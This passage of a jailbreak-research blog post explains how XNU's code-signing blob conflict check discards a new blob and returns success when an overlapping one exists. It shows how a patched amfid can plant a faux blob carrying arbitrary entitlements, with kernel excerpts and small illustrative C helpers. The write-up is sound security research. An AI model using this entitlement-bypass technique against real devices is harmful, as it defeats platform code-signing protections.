<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cm">/* check for conflicting teamid */</span>
<span class="k">if</span> <span class="p">(</span><span class="n">blob</span><span class="o">-></span><span class="n">csb_platform_binary</span><span class="p">)</span> <span class="p">{</span> <span class="c1">//platform binary needs to be the same for app slices</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">oblob</span><span class="o">-></span><span class="n">csb_platform_binary</span><span class="p">)</span> <span class="p">{</span>
<span class="n">vnode_unlock</span><span class="p">(</span><span class="n">vp</span><span class="p">);</span>
<span class="n">error</span> <span class="o">=</span> <span class="n">EALREADY</span><span class="p">;</span>
<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">blob</span><span class="o">-></span><span class="n">csb_teamid</span><span class="p">)</span> <span class="p">{</span> <span class="c1">//teamid binary needs to be the same for app slices</span>
<span class="k">if</span> <span class="p">(</span><span class="n">oblob</span><span class="o">-></span><span class="n">csb_platform_binary</span> <span class="o">||</span>
<span class="n">oblob</span><span class="o">-></span><span class="n">csb_teamid</span> <span class="o">==</span> <span class="nb">NULL</span> <span class="o">||</span>
<span class="n">strcmp</span><span class="p">(</span><span class="n">oblob</span><span class="o">-></span><span class="n">csb_teamid</span><span class="p">,</span> <span class="n">blob</span><span class="o">-></span><span class="n">csb_teamid</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">vnode_unlock</span><span class="p">(</span><span class="n">vp</span><span class="p">);</span>
<span class="n">error</span> <span class="o">=</span> <span class="n">EALREADY</span><span class="p">;</span>
<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="c1">// non teamid binary needs to be the same for app slices</span>
<span class="k">if</span> <span class="p">(</span><span class="n">oblob</span><span class="o">-></span><span class="n">csb_platform_binary</span> <span class="o">||</span>
<span class="n">oblob</span><span class="o">-></span><span class="n">csb_teamid</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
<span class="n">vnode_unlock</span><span class="p">(</span><span class="n">vp</span><span class="p">);</span>
<span class="n">error</span> <span class="o">=</span> <span class="n">EALREADY</span><span class="p">;</span>
<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Now comes the interesting bit. The kernel calculates the offsets of the start and end of the blob based on the <code class="highlighter-rouge">oblob</code> (old blob) struct, and compares them against the newly generated blob to see if they conflict. If the location of the old blob resides within the same area as the new one, it’s marked as a conflict. Then a few further checks take place: the start and end offsets, memory size, blob flags, and <code class="highlighter-rouge">csb_cdhash</code> must be equal, and the cputype must either be equal, or set to <code class="highlighter-rouge">CPU_TYPE_ANY</code> (-1) on either of the blobs.</p>
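<p>The overlap check itself boils down to a standard interval-intersection test. Here’s a sketch of it (in the real code the absolute offsets are computed from <code class="highlighter-rouge">csb_base_offset</code> plus <code class="highlighter-rouge">csb_start_offset</code>/<code class="highlighter-rouge">csb_end_offset</code>; the function and parameter names below are mine):</p>

```c
#include <stdbool.h>

/* Sketch of the kernel's conflict test: two blobs overlap when their
 * absolute [start, end) coverage ranges intersect. */
static bool blobs_overlap(long long new_start, long long new_end,
                          long long old_start, long long old_end)
{
    return !(old_end <= new_start || new_end <= old_start);
}
```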
<p>Now, assuming this is all true, something incredible happens:</p>
<figure class="highlight"><pre><code class="language-text" data-lang="text">/*
* We already have this blob:
* we'll return success but
* throw away the new blob.
*/</code></pre></figure>
<p>What?!</p>
<p>The cputype of the old blob is updated, the return blob is <em>set to the old blob</em>, and a return code of <code class="highlighter-rouge">EAGAIN</code> is set before returning. Let’s take a look at how that’s handled:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="mi">3413</span> <span class="nf">if</span> <span class="p">(</span><span class="n">error</span> <span class="o">==</span> <span class="n">EAGAIN</span><span class="p">)</span> <span class="p">{</span>
<span class="mi">3414</span> <span class="cm">/*
3415 * See above: error is EAGAIN if we were asked
3416 * to add an existing blob again. We cleaned the new
3417 * blob and we want to **return success**.
3418 */</span>
<span class="mi">3419</span> <span class="n">error</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="mi">3420</span> <span class="p">}</span></code></pre></figure>
<p>Let’s summarise what happens here:</p>
<ul>
<li>A new blob starts to be created</li>
<li>AMFI (and therefore amfid) is called - but a blob is not currently present to modify</li>
<li>Some more unimportant flags are set</li>
<li>The kernel loops through all pre-existing blobs in <code class="highlighter-rouge">vnode->ubc_info->cs_blob(->csb_next)</code> (if any)</li>
<li>Some basic checks are done to check for a ‘conflicting teamid’</li>
<li>The start and end offsets of the given old blob are calculated</li>
<li>The kernel checks for a conflict (overlap) between these blobs</li>
<li>If an overlap/conflict is detected, the new blob is <em>discarded</em>, and the kernel <em>returns success!</em></li>
</ul>
<p>This is perfect! If the kernel detects a pre-existing blob, <em>which we can generate from within the amfid patch</em>, the new blob will simply be thrown away, and the function will return success! Furthermore, although in this case there are some fairly strict conditions our faux blob must satisfy (<code class="highlighter-rouge">csb_platform_binary</code> must be set validly, and the start/end offsets, memsize, csflags, and CDHash must match up), the entitlements of the blob <em>are not checked</em>. This means our faux blob can contain any entitlement we might need, and the kernel simply uses them as if nothing is wrong! Perfect!</p>
<p>Let’s look at how this patch might work:</p>
<ul>
<li>amfid is called to, but <code class="highlighter-rouge">cs_blob</code> is not yet present</li>
<li>we use similar logic to the kernel, generating a faux <code class="highlighter-rouge">cs_blob</code>, with the addition of any entitlements we might need</li>
<li>this <code class="highlighter-rouge">cs_blob</code> passes all checks in place, and naturally overlaps with the existing blob</li>
<li>the kernel then discards the new blob, returning our faux blob</li>
<li>execution is continued and the binary is allowed to run</li>
</ul>
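<p>To make those preconditions concrete, here’s a small userland model of the decision the kernel makes when it finds an overlapping blob. The struct and function names are invented for illustration; only the <em>fields being compared</em> mirror the checks in <code class="highlighter-rouge">ubc_cs_blob_add</code>:</p>

```c
#include <string.h>
#include <stdbool.h>

#define CDHASH_LEN 20

/* A userland model of the fields the kernel actually compares.
 * Illustrative only - the real struct lives in XNU's ubc headers. */
struct mini_blob {
    long long start, end;   /* absolute coverage offsets */
    unsigned long mem_size;
    unsigned int flags;
    int cpu_type;           /* -1 == CPU_TYPE_ANY */
    unsigned char cdhash[CDHASH_LEN];
};

/* Returns true when the kernel would keep the old (faux) blob and
 * report success for the new one. */
static bool old_blob_wins(const struct mini_blob *new_blob,
                          const struct mini_blob *old_blob)
{
    if (old_blob->start != new_blob->start) return false;
    if (old_blob->end != new_blob->end) return false;
    if (old_blob->mem_size != new_blob->mem_size) return false;
    if (old_blob->flags != new_blob->flags) return false;
    /* cputypes must match, unless either side is CPU_TYPE_ANY */
    if (old_blob->cpu_type != new_blob->cpu_type &&
        old_blob->cpu_type != -1 && new_blob->cpu_type != -1)
        return false;
    return memcmp(old_blob->cdhash, new_blob->cdhash, CDHASH_LEN) == 0;
}
```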
<p>Here is something important to note with this implementation: many properties of the blob must match up <strong>exactly</strong>. If any of the checks fail, this trick will not work. For example, if the faux blob has <code class="highlighter-rouge">csb_platform_binary</code> or <code class="highlighter-rouge">csb_teamid</code> set and the kernel-generated blob does not, the preliminary checks starting on line 3256 will fail. This is also important for the checks on line 3288. In particular, make sure the <code class="highlighter-rouge">csb_flags</code> match up. This first threw me, as I had binaries with the <code class="highlighter-rouge">get-task-allow</code> entitlement on disk, but I was not updating <code class="highlighter-rouge">csb_flags</code> with the <code class="highlighter-rouge">CS_GET_TASK_ALLOW</code> flag to match, causing those entitled binaries to not run. I simply added an exception checking for the <code class="highlighter-rouge">get-task-allow</code> entitlement and updating <code class="highlighter-rouge">csb_flags</code> if present.</p>
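<p>That exception can be as simple as mirroring the entitlement into the flags before constructing the faux blob. A crude sketch (the <code class="highlighter-rouge">0x4</code> value for <code class="highlighter-rouge">CS_GET_TASK_ALLOW</code> comes from XNU’s codesigning headers; a real implementation should parse the entitlements plist properly rather than substring-matching the raw XML as done here):</p>

```c
#include <string.h>

#define CS_GET_TASK_ALLOW 0x00000004 /* value from XNU's codesigning headers */

/* Crude illustrative helper: if the on-disk binary is entitled with
 * get-task-allow, mirror that into the faux blob's csb_flags. */
static unsigned int flags_for_entitlements(unsigned int csb_flags,
                                           const char *ents_xml)
{
    if (ents_xml && strstr(ents_xml, "get-task-allow"))
        csb_flags |= CS_GET_TASK_ALLOW;
    return csb_flags;
}
```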
<p>A nice trick: notice how the kernel doesn’t mind if you have <code class="highlighter-rouge">csb_cpu_type</code> set to -1 (<code class="highlighter-rouge">CPU_TYPE_ANY</code>). In this case, it will simply update your cpu_type with the one provided by the <code class="highlighter-rouge">load_code_signature</code> function. The less manual parsing the better, right?</p>
<p>In conclusion, although problems such as the requirement of certain entitlements do exist, it’s always worth playing around with the code responsible for the problem to see whether there’s any way to bend its behaviour in your favour. Many parts of the kernel aren’t designed with anti-jailbreak mechanisms or security in mind, especially considering many of these checks would simply be patched out in a typical kppbypass jailbreak. It may take quite a while for Apple to catch up with the tricks used by kppless, and I’m sure there will always be more to find.</p>
<p>I would firstly like to thank <a href="https://twitter.com/stek29">@stek29</a> for coming up with the idea of patching entitlements in memory (although not this specific trick - neither of us initially realized this was an issue). I would also like to thank <a href="https://twitter.com/sbingner">@sbingner</a> for helping me work through this problem and spending hours upon hours scouring through kernel code and investigating other potential solutions to this problem. For questions, feel free to Tweet me and/or follow me <a href="https://twitter.com/ibsparkes">@iBSparkes</a>.</p>
<p>Cheers!</p>
<p>→ PsychoTea (Ben)</p>